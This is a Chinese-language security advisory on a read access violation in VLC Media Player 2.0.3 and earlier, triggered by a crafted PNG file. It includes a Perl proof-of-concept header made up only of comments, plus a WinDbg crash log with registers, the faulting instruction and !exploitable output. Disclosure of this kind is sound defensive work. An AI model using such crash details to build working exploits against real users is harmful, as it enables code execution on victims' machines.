VLC Media Player非法读取任意代码执行漏洞

发布日期：2012-10-10
更新日期：2012-10-112

受影响系统：
VideoLAN VLC Media Player < 2.0.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55850

VLC Media Player是多媒体播放器（最初命名为VideoLAN客户端）是VideoLAN计划的多媒体播放器。

VLC Media Player 2.0.3及更早版本存在安全漏洞，成功利用后可允许攻击者在受影响应用中执行任意代码。

<*来源：Jean Pascal Pereira
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl

# VLC Player 2.0.3 <= ReadAV Arbitrary Code Execution

# Author: Jean Pascal Pereira <pereira@secbiz.de>

# Vendor URI:

# Vendor Description:
# VLC is a free and open source cross-platform multimedia player
# and framework that plays most multimedia files as well as DVD,
# Audio CD, VCD, and various streaming protocols.

# Debug Info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe" C:\research\VLC\crafted.png
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path.          *
# * Use .symfix to have the debugger choose a symbol path.                  *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 00420000  image00400000
# ModLoad: 7c900000 7c9b2000  ntdll.dll
# ModLoad: 7c800000 7c8f6000  C:\WINDOWS\system32\kernel32.dll
# ModLoad: 6a300000 6a322000  C:\Program Files\VideoLAN\VLC\libvlc.dll
# ModLoad: 6a540000 6a775000  C:\Program Files\VideoLAN\VLC\libvlccore.dll
# ModLoad: 77dd0000 77e6b000  C:\WINDOWS\system32\ADVAPI32.DLL
# ModLoad: 77e70000 77f03000  C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000  C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77c10000 77c68000  C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 7c9c0000 7d1d7000  C:\WINDOWS\system32\SHELL32.DLL
# ModLoad: 77f10000 77f59000  C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000  C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f60000 77fd6000  C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 76b40000 76b6d000  C:\WINDOWS\system32\WINMM.DLL
# ModLoad: 71ab0000 71ac7000  C:\WINDOWS\system32\WS2_32.DLL
# ModLoad: 71aa0000 71aa8000  C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 76bf0000 76bfb000  C:\WINDOWS\system32\PSAPI.DLL
# ModLoad: 3d930000 3da16000  C:\WINDOWS\system32\WININET.DLL
# ModLoad: 003f0000 003f9000  C:\WINDOWS\system32\Normaliz.dll
# ModLoad: 78130000 78263000  C:\WINDOWS\system32\urlmon.dll
# ModLoad: 774e0000 7761e000  C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000  C:\WINDOWS\system32\OLEAUT32.dll
# ModLoad: 3dfd0000 3e1bb000  C:\WINDOWS\system32\iertutil.dll
# (950.5c0): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000  C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 773d0000 774d3000  C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 64fc0000 64ffb000  C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
# ModLoad: 6b240000 6b253000  C:\Program Files\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll
# ModLoad: 6e980000 6e992000  C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
# ModLoad: 6d680000 6d698000  C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll
# ModLoad: 63880000 63890000  C:\Program Files\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll
# ModLoad: 6c400000 6c443000  C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
# ModLoad: 68740000 6875d000  C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
# ModLoad: 6f440000 6f485000  C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
# ModLoad: 6b840000 6b852000  C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
# ModLoad: 6f100000 6f111000  C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
# ModLoad: 63a80000 63af3000  C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll
# ModLoad: 00f00000 00fb7000  C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll
# ModLoad: 69e40000 69e50000  C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
# ModLoad: 6ae40000 6ae5b000  C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
# ModLoad: 64ac0000 64acf000  C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll
# ModLoad: 70240000 70260000  C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
# ModLoad: 6cd00000 6ce48000  C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
# ModLoad: 66040000 66092000  C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
# ModLoad: 625c0000 626f4000  C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
# ModLoad: 6ff40000 6ff52000  C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
# ModLoad: 6e180000 6e190000  C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
# ModLoad: 6d6c0000 6d6f6000  C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
# ModLoad: 6e040000 6e05c000  C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
# ModLoad: 68440000 68458000  C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
# ModLoad: 6c380000 6c391000  C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
# ModLoad: 6ef40000 6ef51000  C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
# ModLoad: 69840000 6985d000  C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
# ModLoad: 62380000 62391000  C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
# ModLoad: 6c2c0000 6c2d0000  C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
# ModLoad: 67e00000 67e10000  C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
# ModLoad: 021f0000 022e3000  C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
# ModLoad: 6bf40000 6bf5b000  C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
# ModLoad: 6a840000 6a976000  C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
# ModLoad: 6d8c0000 6d978000  C:\Program Files\VideoLAN\VLC\plugins\demux\liblive555_plugin.dll
# ModLoad: 6f8c0000 6f8df000  C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
# ModLoad: 70b00000 70b0f000  C:\Program Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
# ModLoad: 64740000 64750000  C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
# ModLoad: 65280000 65290000  C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
# ModLoad: 6cbc0000 6cbd0000  C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
# ModLoad: 6a9c0000 6a9e6000  C:\Program Files\VideoLAN\VLC\plugins\demux\libts_plugin.dll
# ModLoad: 68940000 68950000  C:\Program Files\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll
# ModLoad: 6fec0000 6fecf000  C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
# ModLoad: 6b500000 6b56a000  C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
# ModLoad: 6ce80000 6ce90000  C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
# ModLoad: 65300000 6530f000  C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
# ModLoad: 653c0000 654c0000  C:\Program Files\VideoLAN\VLC\plugins\demux\libmod_plugin.dll
# ModLoad: 67500000 67510000  C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
# ModLoad: 6c940000 6c952000  C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
# ModLoad: 683c0000 683f3000  C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
# (950.ee4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e0f848 ebx=1b000019 ecx=06bfde49 edx=00000001 esi=00e17fff edi=10018714
# eip=683c1b70 esp=013df768 ebp=013df7c0 iopl=0        nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00010206
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
# libpng_plugin!vlc_entry_license__1_2_0l+0x770:
# 683c1b70 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# 0:003> g;r;!exploitable -v;q
# (950.ee4): Access violation - code c0000005 (!!! second chance !!!)
# eax=00e0f848 ebx=1b000019 ecx=06bfde49 edx=00000001 esi=00e17fff edi=10018714
# eip=683c1b70 esp=013df768 ebp=013df7c0 iopl=0        nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00000206
# libpng_plugin!vlc_entry_license__1_2_0l+0x770:
# 683c1b70 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\libvlccore.dll -
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
# Exception Faulting Address: 0xe18000
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation

# Faulting Instruction:683c1b70 rep movs dword ptr es:[edi],dword ptr [esi]

# Exception Hash (Major/Minor): 0x7c452c55.0x1c172051